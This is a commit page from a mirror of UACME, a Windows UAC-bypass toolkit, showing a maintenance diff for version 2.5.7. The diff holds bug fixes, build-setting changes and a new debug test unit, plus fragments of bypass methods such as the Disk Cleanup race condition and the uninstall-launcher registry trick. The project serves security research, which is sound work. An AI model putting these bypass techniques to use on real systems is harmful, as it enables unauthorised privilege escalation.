Rooba
/
UACME
mirror of https://github.com/hfiref0x/UACME.git
1
1
Fork 0
Code Issues Packages Projects Releases Wiki Activity

v 2.5.7 

Mostly maintenance with bug fixes, yuubari updated for 15048
This commit is contained in:
hfiref0x 2017-03-08 13:51:38 +07:00
parent bd5ee4d820
commit 25aae12bb7
47 changed files with 690 additions and 165 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

BIN
Compiled/Akagi32.exe
View File

Binary file not shown.

BIN
Compiled/Akagi64.exe
View File

Binary file not shown.

BIN
Compiled/UacInfo64.exe
View File

Binary file not shown.

BIN
Source/Akagi/Resource.rc
View File

Binary file not shown.

BIN
Source/Akagi/bin/Ikazuchi32.cd
View File

Binary file not shown.

BIN
Source/Akagi/bin/Ikazuchi64.cd
View File

Binary file not shown.

BIN
Source/Akagi/bin/fubuki32.cd
View File

Binary file not shown.

BIN
Source/Akagi/bin/fubuki64.cd
View File

Binary file not shown.

BIN
Source/Akagi/bin/hibiki32.cd
View File

Binary file not shown.

BIN
Source/Akagi/bin/hibiki64.cd
View File

Binary file not shown.

6
Source/Akagi/comet.h
View File

@ -4,9 +4,9 @@
*
* TITLE: COMET.H
*
* VERSION: 2.52
* VERSION: 2.57
*
* DATE: 17 Jan 2017
* DATE: 07 Mar 2017
*
* Prototypes and definitions for Comet method.
*
@ -19,5 +19,5 @@
#pragma once
BOOL ucmCometMethod(
LPWSTR lpszPayload
_In_ LPWSTR lpszPayload
);

10
Source/Akagi/compress.c
View File

@ -4,9 +4,9 @@
*
* TITLE: COMPRESS.C
*
* VERSION: 2.56
* VERSION: 2.57
*
* DATE: 15 Feb 2017
* DATE: 01 Mar 2017
*
* Compression support.
*
@ -75,6 +75,12 @@ PUCHAR DecompressBufferLZNT1(
PUCHAR UncompBuffer = NULL;
NTSTATUS status;
if (FinalUncompressedSize)
*FinalUncompressedSize = 0;
if (UncompressedBufferSize == 0)
return NULL;
UncompBuffer = (PUCHAR)VirtualAlloc(NULL, UncompressedBufferSize,
MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

5
Source/Akagi/enigma0x3.c
View File

@ -4,7 +4,7 @@
*
* TITLE: ENIGMA0X3.C
*
* VERSION: 2.54
* VERSION: 2.57
*
* DATE: 07 Feb 2017
*
@ -256,10 +256,11 @@ BOOL ucmDiskCleanupRaceCondition(
shinfo.lpParameters = T_SCHTASKS_CMD;
shinfo.nShow = SW_SHOW;
if (ShellExecuteExW(&shinfo)) {
if (shinfo.hProcess)
if (shinfo.hProcess != NULL) {
WaitForSingleObject(shinfo.hProcess, INFINITE);
CloseHandle(shinfo.hProcess);
}
}
//
// Because cleanmgr.exe is slow we need to wait enough time until it will try to launch dismhost.exe
// It may happen very fast or really slow depending on resources usage.

7
Source/Akagi/explife.c
View File

@ -4,9 +4,9 @@
*
* TITLE: EXPLIFE.C
*
* VERSION: 2.56
* VERSION: 2.57
*
* DATE: 14 Feb 2017
* DATE: 07 Mar 2017
*
* ExpLife UAC bypass using IARPUninstallStringLauncher.
* For description please visit original URL
@ -100,7 +100,7 @@ BOOL ucmUninstallLauncherMethod(
break;
_strcpy(szKeyName, L"Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\");
StringFromGUID2(&guid, szGuid, sizeof(szGuid));
if (StringFromGUID2(&guid, szGuid, sizeof(szGuid) / sizeof(WCHAR))) {
_strcat(szKeyName, szGuid);
lResult = RegCreateKeyEx(HKEY_CURRENT_USER,
@ -116,6 +116,7 @@ BOOL ucmUninstallLauncherMethod(
break;
bResult = ucmMasqueradedAPRLaunchFile(szGuid);
}
} while (bCond);

8
Source/Akagi/global.h
View File

@ -4,9 +4,9 @@
*
* TITLE: GLOBAL.H
*
* VERSION: 2.55
* VERSION: 2.57
*
* DATE: 10 Feb 2017
* DATE: 28 Feb 2017
*
* Common header file for the program support routines.
*
@ -79,6 +79,9 @@ typedef enum _UACBYPASSMETHOD {
UacMethodEnigma0x3,
UacMethodEnigma0x3_2,
UacMethodExpLife,
#ifdef _DEBUG
UacMethodTest,
#endif
UacMethodMax
} UACBYPASSMETHOD;
@ -101,6 +104,7 @@ typedef enum _UACBYPASSMETHOD {
#include "hybrids.h"
#include "comet.h"
#include "enigma0x3.h"
#include "tests\test.h"
//default execution flow
#define AKAGI_FLAG_KILO 0

10
Source/Akagi/hybrids.c
View File

@ -4,9 +4,9 @@
*
* TITLE: HYBRIDS.C
*
* VERSION: 2.56
* VERSION: 2.57
*
* DATE: 15 Feb 2017
* DATE: 01 Mar 2017
*
* Hybrid UAC bypass methods.
*
@ -1197,12 +1197,18 @@ BOOL ucmSetupAkagiLink(
lpUser = _filename(usKey.Buffer);
ParentRoot.Buffer = NULL;
ParentRoot.Length = 0;
ParentRoot.MaximumLength = 0;
RtlInitUnicodeString(&ParentRoot, L"\\Rpc Control\\Akagi");
InitializeObjectAttributes(&attr, &ParentRoot, OBJ_CASE_INSENSITIVE, 0, NULL);
status = NtCreateDirectoryObject(&hRoot, DIRECTORY_CREATE_SUBDIRECTORY, &attr);
if (!NT_SUCCESS(status))
break;
ChildName.Buffer = NULL;
ChildName.Length = 0;
ChildName.MaximumLength = 0;
RtlInitUnicodeString(&ChildName, lpUser);
attr.RootDirectory = hRoot;
attr.ObjectName = &ChildName;

10
Source/Akagi/main.c
View File

@ -4,9 +4,9 @@
*
* TITLE: MAIN.C
*
* VERSION: 2.56
* VERSION: 2.57
*
* DATE: 13 Feb 2017
* DATE: 28 Feb 2017
*
* Program entry point.
*
@ -850,6 +850,11 @@ UINT ucmMain()
return ERROR_SUCCESS;
}
break;
#ifdef _DEBUG
case UacMethodTest:
UACMeTest();
break;
#endif
}
return ERROR_ACCESS_DENIED;
@ -902,6 +907,7 @@ VOID main()
uctx.ucmMain = (pfnEntryPoint)ucmMain;
RtlPushFrame((PTEB_ACTIVE_FRAME)&uctx);
#pragma warning(suppress: 28159)
k = ~GetTickCount();
g_ExCookie = RtlRandomEx(&k);

5
Source/Akagi/sirefef.h
View File

@ -4,9 +4,9 @@
*
* TITLE: SIREFEF.H
*
* VERSION: 2.53
* VERSION: 2.57
*
* DATE: 18 Jan 2017
* DATE: 01 Mar 2017
*
* Prototypes and definitions for Sirefef/ZeroAccess method.
*
@ -57,6 +57,7 @@ typedef HANDLE(NTAPI *pfnCreateRemoteThread)(
_Out_opt_ LPDWORD lpThreadId
);
#pragma warning(suppress: 28301)
typedef DWORD(WINAPI *pfnWaitForSingleObject)(
_In_ HANDLE hHandle,
_In_ DWORD dwMilliseconds

190
Source/Akagi/tests/test.c Normal file
View File

@ -0,0 +1,190 @@
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2017
*
* TITLE: TEST.C
*
* VERSION: 2.57
*
* DATE: 28 Feb 2017
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#include "global.h"
#define T_REGISTRY_USER L"\\REGISTRY\\USER\\"
#define REGISTRY_USER_LENGTH sizeof(T_REGISTRY_USER) - sizeof(WCHAR)
#define T_AKAGI_KEY L"Software\\Akagi"
#define AKAGI_KEY_LENGTH sizeof(T_AKAGI_KEY) - sizeof(WCHAR)
typedef NTSTATUS(NTAPI *PENUMOBJECTSCALLBACK)(POBJECT_DIRECTORY_INFORMATION Entry, PVOID CallbackParam);
typedef struct _OBJSCANPARAM {
PWSTR Buffer;
SIZE_T BufferSize;
} OBJSCANPARAM, *POBJSCANPARAM;
/*
* supEnumSystemObjects
*
* Purpose:
*
* Lookup object by name in given directory.
*
*/
NTSTATUS NTAPI supEnumSystemObjects(
_In_opt_ LPWSTR pwszRootDirectory,
_In_opt_ HANDLE hRootDirectory,
_In_ PENUMOBJECTSCALLBACK CallbackProc,
_In_opt_ PVOID CallbackParam
)
{
BOOL cond = TRUE;
ULONG ctx, rlen;
HANDLE hDirectory = NULL;
NTSTATUS status;
NTSTATUS CallbackStatus;
OBJECT_ATTRIBUTES attr;
UNICODE_STRING sname;
POBJECT_DIRECTORY_INFORMATION objinf;
if (CallbackProc == NULL) {
return STATUS_INVALID_PARAMETER_4;
}
status = STATUS_UNSUCCESSFUL;
// We can use root directory.
if (pwszRootDirectory != NULL) {
RtlSecureZeroMemory(&sname, sizeof(sname));
RtlInitUnicodeString(&sname, pwszRootDirectory);
InitializeObjectAttributes(&attr, &sname, OBJ_CASE_INSENSITIVE, NULL, NULL);
status = NtOpenDirectoryObject(&hDirectory, DIRECTORY_QUERY, &attr);
if (!NT_SUCCESS(status)) {
return status;
}
}
else {
if (hRootDirectory == NULL) {
return STATUS_INVALID_PARAMETER_2;
}
hDirectory = hRootDirectory;
}
// Enumerate objects in directory.
ctx = 0;
do {
rlen = 0;
status = NtQueryDirectoryObject(hDirectory, NULL, 0, TRUE, FALSE, &ctx, &rlen);
if (status != STATUS_BUFFER_TOO_SMALL)
break;
objinf = RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, HEAP_ZERO_MEMORY, rlen);
if (objinf == NULL)
break;
status = NtQueryDirectoryObject(hDirectory, objinf, rlen, TRUE, FALSE, &ctx, &rlen);
if (!NT_SUCCESS(status)) {
RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, objinf);
break;
}
CallbackStatus = CallbackProc(objinf, CallbackParam);
RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, objinf);
if (NT_SUCCESS(CallbackStatus)) {
status = STATUS_SUCCESS;
break;
}
} while (cond);
if (hDirectory != NULL) {
NtClose(hDirectory);
}
return status;
}
/*
* supDetectObjectCallback
*
* Purpose:
*
* Comparer callback routine used in objects enumeration.
*
*/
NTSTATUS NTAPI supDetectObjectCallback(
_In_ POBJECT_DIRECTORY_INFORMATION Entry,
_In_ PVOID CallbackParam
)
{
SIZE_T BufferSize;
POBJSCANPARAM Param = (POBJSCANPARAM)CallbackParam;
if (Entry == NULL) {
return STATUS_INVALID_PARAMETER_1;
}
if (CallbackParam == NULL) {
return STATUS_INVALID_PARAMETER_2;
}
if (Entry->Name.Buffer) {
BufferSize = Entry->Name.Length + sizeof(UNICODE_NULL);
Param->Buffer = RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, HEAP_ZERO_MEMORY, BufferSize);
if (Param->Buffer) {
Param->BufferSize = BufferSize;
_strncpy(
Param->Buffer, Param->BufferSize / sizeof(WCHAR),
Entry->Name.Buffer, Entry->Name.Length / sizeof(WCHAR)
);
return STATUS_SUCCESS;
}
}
return STATUS_UNSUCCESSFUL;
}
VOID UACMeTest()
{
OBJSCANPARAM Param;
NTSTATUS status;
LPWSTR lpszParamKey = NULL;
SIZE_T memIO;
ucmSetupAkagiLink();
Param.Buffer = NULL;
Param.BufferSize = 0;
status = supEnumSystemObjects(L"\\Rpc Control\\Akagi", NULL,
supDetectObjectCallback, &Param);
if (!NT_SUCCESS(status))
return;
if ((Param.Buffer == NULL) || (Param.BufferSize == 0))
return;
memIO = MAX_PATH + Param.BufferSize + REGISTRY_USER_LENGTH + AKAGI_KEY_LENGTH;
lpszParamKey = RtlAllocateHeap(GetProcessHeap(), HEAP_ZERO_MEMORY, memIO);
if (lpszParamKey == NULL)
return;
_strcpy_w(lpszParamKey, T_REGISTRY_USER);
_strcat_w(lpszParamKey, Param.Buffer);
_strcat_w(lpszParamKey, L"\\");
_strcat_w(lpszParamKey, T_AKAGI_KEY);
}

95
Source/Akagi/tests/test.h Normal file
View File

@ -0,0 +1,95 @@
#/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2017
*
* TITLE: TEST.H
*
* VERSION: 2.57
*
* DATE: 28 Feb 2017
*
* Test unit header file.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#pragma once
typedef interface ITestInterface ITestInterface;
typedef struct ITestInterfaceVtbl {
BEGIN_INTERFACE
HRESULT(STDMETHODCALLTYPE *QueryInterface)(
__RPC__in ITestInterface * This,
__RPC__in REFIID riid,
_COM_Outptr_ void **ppvObject);
ULONG(STDMETHODCALLTYPE *AddRef)(
__RPC__in ITestInterface * This);
ULONG(STDMETHODCALLTYPE *Release)(
__RPC__in ITestInterface * This);
HRESULT(STDMETHODCALLTYPE *Method1)(
__RPC__in ITestInterface * This);
HRESULT(STDMETHODCALLTYPE *Method2)(
__RPC__in ITestInterface * This);
HRESULT(STDMETHODCALLTYPE *Method3)(
__RPC__in ITestInterface * This);
HRESULT(STDMETHODCALLTYPE *Method4)(
__RPC__in ITestInterface * This);
HRESULT(STDMETHODCALLTYPE *Method5)(
__RPC__in ITestInterface * This);
HRESULT(STDMETHODCALLTYPE *Method6)(
__RPC__in ITestInterface * This);
HRESULT(STDMETHODCALLTYPE *Method7)(
__RPC__in ITestInterface * This);
HRESULT(STDMETHODCALLTYPE *Method8)(
__RPC__in ITestInterface * This);
HRESULT(STDMETHODCALLTYPE *Method9)(
__RPC__in ITestInterface * This);
HRESULT(STDMETHODCALLTYPE *Method10)(
__RPC__in ITestInterface * This);
HRESULT(STDMETHODCALLTYPE *Method11)(
__RPC__in ITestInterface * This);
HRESULT(STDMETHODCALLTYPE *Method12)(
__RPC__in ITestInterface * This);
HRESULT(STDMETHODCALLTYPE *Method13)(
__RPC__in ITestInterface * This);
HRESULT(STDMETHODCALLTYPE *Method14)(
__RPC__in ITestInterface * This);
HRESULT(STDMETHODCALLTYPE *Method15)(
__RPC__in ITestInterface * This);
HRESULT(STDMETHODCALLTYPE *Method16)(
__RPC__in ITestInterface * This);
END_INTERFACE
} *PITestInterfaceVtbl;
interface ITestInterface
{
CONST_VTBL struct ITestInterfaceVtbl *lpVtbl;
};
VOID UACMeTest();

10
Source/Akagi/uacme.vcxproj
View File

@ -85,7 +85,7 @@
<LinkIncremental>false</LinkIncremental>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
<CodeAnalysisRuleSet>SecurityRules.ruleset</CodeAnalysisRuleSet>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<TargetName>$(ProjectName)32</TargetName>
<RunCodeAnalysis>true</RunCodeAnalysis>
</PropertyGroup>
@ -94,7 +94,7 @@
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
<TargetName>$(ProjectName)64</TargetName>
<CodeAnalysisRuleSet>SecurityRules.ruleset</CodeAnalysisRuleSet>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<RunCodeAnalysis>true</RunCodeAnalysis>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
@ -106,6 +106,7 @@
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<SDLCheck>true</SDLCheck>
<EnablePREfast>false</EnablePREfast>
<AdditionalIncludeDirectories>$(ProjectDir)</AdditionalIncludeDirectories>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
@ -132,6 +133,7 @@
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<SDLCheck>true</SDLCheck>
<EnablePREfast>false</EnablePREfast>
<AdditionalIncludeDirectories>$(ProjectDir)</AdditionalIncludeDirectories>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
@ -167,6 +169,7 @@
<StringPooling>
</StringPooling>
<IntrinsicFunctions>true</IntrinsicFunctions>
<AdditionalIncludeDirectories>$(ProjectDir)</AdditionalIncludeDirectories>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
@ -207,6 +210,7 @@
<StringPooling>
</StringPooling>
<IntrinsicFunctions>true</IntrinsicFunctions>
<AdditionalIncludeDirectories>$(ProjectDir)</AdditionalIncludeDirectories>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
@ -258,6 +262,7 @@
<ClCompile Include="pitou.c" />
<ClCompile Include="simda.c" />
<ClCompile Include="sup.c" />
<ClCompile Include="tests\test.c" />
</ItemGroup>
<ItemGroup>
<ClInclude Include="..\shared\minirtl.h" />
@ -280,6 +285,7 @@
<ClInclude Include="simda.h" />
<ClInclude Include="sirefef.h" />
<ClInclude Include="sup.h" />
<ClInclude Include="tests\test.h" />
</ItemGroup>
<ItemGroup>
<ResourceCompile Include="bin32res.rc">

9
Source/Akagi/uacme.vcxproj.filters
View File

@ -16,6 +16,9 @@
<Filter Include="minirtl">
<UniqueIdentifier>{1caf2f34-af91-46be-aa2e-1893b0be628c}</UniqueIdentifier>
</Filter>
<Filter Include="testunits">
<UniqueIdentifier>{c4fc1dcf-e216-4458-a377-e7203d627128}</UniqueIdentifier>
</Filter>
</ItemGroup>
<ItemGroup>
<ClCompile Include="main.c">
@ -99,6 +102,9 @@
<ClCompile Include="..\Shared\ultohex.c">
<Filter>minirtl</Filter>
</ClCompile>
<ClCompile Include="tests\test.c">
<Filter>testunits</Filter>
</ClCompile>
</ItemGroup>
<ItemGroup>
<ClInclude Include="global.h">
@ -161,6 +167,9 @@
<ClInclude Include="..\Shared\_filename.h">
<Filter>minirtl</Filter>
</ClInclude>
<ClInclude Include="tests\test.h">
<Filter>testunits</Filter>
</ClInclude>
</ItemGroup>
<ItemGroup>
<ResourceCompile Include="Resource.rc">

8
Source/Akagi/uacme.vcxproj.user
View File

@ -1,19 +1,19 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<LocalDebuggerCommandArguments>4</LocalDebuggerCommandArguments>
<LocalDebuggerCommandArguments>28</LocalDebuggerCommandArguments>
<DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<LocalDebuggerCommandArguments>10</LocalDebuggerCommandArguments>
<LocalDebuggerCommandArguments>28</LocalDebuggerCommandArguments>
<DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<LocalDebuggerCommandArguments>26</LocalDebuggerCommandArguments>
<LocalDebuggerCommandArguments>22</LocalDebuggerCommandArguments>
<DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<LocalDebuggerCommandArguments>16</LocalDebuggerCommandArguments>
<LocalDebuggerCommandArguments>22</LocalDebuggerCommandArguments>
<DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
</PropertyGroup>
</Project>

18
Source/Fubuki/dll.vcxproj
View File

@ -74,6 +74,7 @@
<GenerateManifest>false</GenerateManifest>
<CodeAnalysisRuleSet>SecurityRules.ruleset</CodeAnalysisRuleSet>
<TargetName>$(ProjectName)32</TargetName>
<EmbedManifest>false</EmbedManifest>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<LinkIncremental>true</LinkIncremental>
@ -81,20 +82,23 @@
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
<TargetName>$(ProjectName)64</TargetName>
<CodeAnalysisRuleSet>SecurityRules.ruleset</CodeAnalysisRuleSet>
<EmbedManifest>false</EmbedManifest>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
<GenerateManifest>true</GenerateManifest>
<CodeAnalysisRuleSet>SecurityRules.ruleset</CodeAnalysisRuleSet>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<TargetName>$(ProjectName)32</TargetName>
<EmbedManifest>false</EmbedManifest>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<LinkIncremental>false</LinkIncremental>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
<TargetName>$(ProjectName)64</TargetName>
<CodeAnalysisRuleSet>SecurityRules.ruleset</CodeAnalysisRuleSet>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<EmbedManifest>false</EmbedManifest>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
@ -112,6 +116,7 @@
<BufferSecurityCheck>false</BufferSecurityCheck>
<CreateHotpatchableImage>false</CreateHotpatchableImage>
<CompileAs>CompileAsC</CompileAs>
<AdditionalIncludeDirectories>$(SolutionDir)</AdditionalIncludeDirectories>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
@ -135,6 +140,7 @@
</MultiProcessorCompilation>
<BufferSecurityCheck>false</BufferSecurityCheck>
<CompileAs>CompileAsC</CompileAs>
<AdditionalIncludeDirectories>$(SolutionDir)</AdditionalIncludeDirectories>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
@ -163,6 +169,7 @@
<CreateHotpatchableImage>false</CreateHotpatchableImage>
<CompileAs>CompileAsC</CompileAs>
<DebugInformationFormat>None</DebugInformationFormat>
<AdditionalIncludeDirectories>$(SolutionDir)</AdditionalIncludeDirectories>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
@ -178,6 +185,9 @@
<GenerateDebugInformation>No</GenerateDebugInformation>
<LinkTimeCodeGeneration>UseLinkTimeCodeGeneration</LinkTimeCodeGeneration>
</Link>
<PostBuildEvent>
<Command>\Utils\StripDebug.exe .\output\$(Platform)\$(Configuration)\Fubuki32.dll</Command>
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile>
@ -193,6 +203,7 @@
<StringPooling>true</StringPooling>
<BufferSecurityCheck>false</BufferSecurityCheck>
<CompileAs>CompileAsC</CompileAs>
<AdditionalIncludeDirectories>$(SolutionDir)</AdditionalIncludeDirectories>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
@ -205,6 +216,9 @@
<ModuleDefinitionFile>export.def</ModuleDefinitionFile>
<AdditionalDependencies>Shell32.lib;%(AdditionalDependencies)</AdditionalDependencies>
</Link>
<PostBuildEvent>
<Command>\Utils\StripDebug.exe .\output\$(Platform)\$(Configuration)\Fubuki64.dll</Command>
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemGroup>
<ClCompile Include="..\shared\_strcat.c" />

8
Source/Fubuki/dllmain.c
View File

@ -4,9 +4,9 @@
*
* TITLE: DLLMAIN.C
*
* VERSION: 2.53
* VERSION: 2.57
*
* DATE: 18 Jan 2017
* DATE: 03 Mar 2017
*
* Proxy dll entry point, Fubuki Kai Ni.
*
@ -29,9 +29,9 @@
#pragma warning(disable: 6102) // Using %s from failed function call at line %u
#include <windows.h>
#include "..\Shared\ntos.h"
#include "shared\ntos.h"
#include <ntstatus.h>
#include "..\shared\minirtl.h"
#include "shared\minirtl.h"
#include "unbcl.h"
#include "wbemcomn.h"

BIN
Source/Fubuki/version.rc
View File

Binary file not shown.

34
Source/Hibiki/Hibiki.vcxproj
View File

@ -72,6 +72,7 @@
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
<TargetName>$(ProjectName)32</TargetName>
<CodeAnalysisRuleSet>SecurityRules.ruleset</CodeAnalysisRuleSet>
<EmbedManifest>false</EmbedManifest>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<LinkIncremental>true</LinkIncremental>
@ -79,22 +80,25 @@
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
<TargetName>$(ProjectName)64</TargetName>
<CodeAnalysisRuleSet>SecurityRules.ruleset</CodeAnalysisRuleSet>
<EmbedManifest>false</EmbedManifest>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<LinkIncremental>false</LinkIncremental>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
<TargetName>$(ProjectName)32</TargetName>
<CodeAnalysisRuleSet>SecurityRules.ruleset</CodeAnalysisRuleSet>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<RunCodeAnalysis>true</RunCodeAnalysis>
<EmbedManifest>false</EmbedManifest>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<LinkIncremental>false</LinkIncremental>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
<TargetName>$(ProjectName)64</TargetName>
<CodeAnalysisRuleSet>SecurityRules.ruleset</CodeAnalysisRuleSet>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<RunCodeAnalysis>true</RunCodeAnalysis>
<EmbedManifest>false</EmbedManifest>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
@ -105,6 +109,7 @@
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;HIBIKI_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<BufferSecurityCheck>false</BufferSecurityCheck>
<CompileAs>CompileAsC</CompileAs>
<AdditionalIncludeDirectories>$(SolutionDir)</AdditionalIncludeDirectories>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
@ -114,6 +119,10 @@
<EntryPointSymbol>DllMain</EntryPointSymbol>
<ImageHasSafeExceptionHandlers>false</ImageHasSafeExceptionHandlers>
</Link>
<Manifest>
<AdditionalManifestFiles>
</AdditionalManifestFiles>
</Manifest>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<ClCompile>
@ -124,6 +133,7 @@
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;HIBIKI_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<BufferSecurityCheck>false</BufferSecurityCheck>
<CompileAs>CompileAsC</CompileAs>
<AdditionalIncludeDirectories>$(SolutionDir)</AdditionalIncludeDirectories>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
@ -133,6 +143,10 @@
<EntryPointSymbol>DllMain</EntryPointSymbol>
<ImageHasSafeExceptionHandlers>false</ImageHasSafeExceptionHandlers>
</Link>
<Manifest>
<AdditionalManifestFiles>
</AdditionalManifestFiles>
</Manifest>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
@ -148,6 +162,7 @@
<BufferSecurityCheck>false</BufferSecurityCheck>
<CompileAs>CompileAsC</CompileAs>
<EnablePREfast>true</EnablePREfast>
<AdditionalIncludeDirectories>$(SolutionDir)</AdditionalIncludeDirectories>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
@ -160,6 +175,13 @@
<SetChecksum>true</SetChecksum>
<ImageHasSafeExceptionHandlers>false</ImageHasSafeExceptionHandlers>
</Link>
<PostBuildEvent>
<Command>\Utils\StripDebug.exe .\output\$(Platform)\$(Configuration)\Hibiki32.dll</Command>
</PostBuildEvent>
<Manifest>
<AdditionalManifestFiles>
</AdditionalManifestFiles>
</Manifest>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile>
@ -175,6 +197,7 @@
<BufferSecurityCheck>false</BufferSecurityCheck>
<CompileAs>CompileAsC</CompileAs>
<EnablePREfast>true</EnablePREfast>
<AdditionalIncludeDirectories>$(SolutionDir)</AdditionalIncludeDirectories>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
@ -187,6 +210,13 @@
<SetChecksum>true</SetChecksum>
<ImageHasSafeExceptionHandlers>false</ImageHasSafeExceptionHandlers>
</Link>
<PostBuildEvent>
<Command>\Utils\StripDebug.exe .\output\$(Platform)\$(Configuration)\Hibiki64.dll</Command>
</PostBuildEvent>
<Manifest>
<AdditionalManifestFiles>
</AdditionalManifestFiles>
</Manifest>
</ItemDefinitionGroup>
<ItemGroup>
<ClCompile Include="..\Shared\ultostr.c" />

10
Source/Hibiki/dllmain.c
View File

@ -1,12 +1,12 @@
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2014 - 2016
* (C) COPYRIGHT AUTHORS, 2014 - 2017
*
* TITLE: DLLMAIN.C
*
* VERSION: 2.10
* VERSION: 2.57
*
* DATE: 14 Apr 2016
* DATE: 07 Mar 2017
*
* AVrf entry point, Hibiki Kai Ni.
*
@ -30,8 +30,8 @@
#include <windows.h>
#include <ntstatus.h>
#include "..\shared\ntos.h"
#include "..\shared\minirtl.h"
#include "shared\ntos.h"
#include "shared\minirtl.h"
#if (_MSC_VER >= 1900)

BIN
Source/Hibiki/version.rc
View File

Binary file not shown.

18
Source/Ikazuchi/Ikazuchi.vcxproj
View File

@ -75,6 +75,7 @@
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
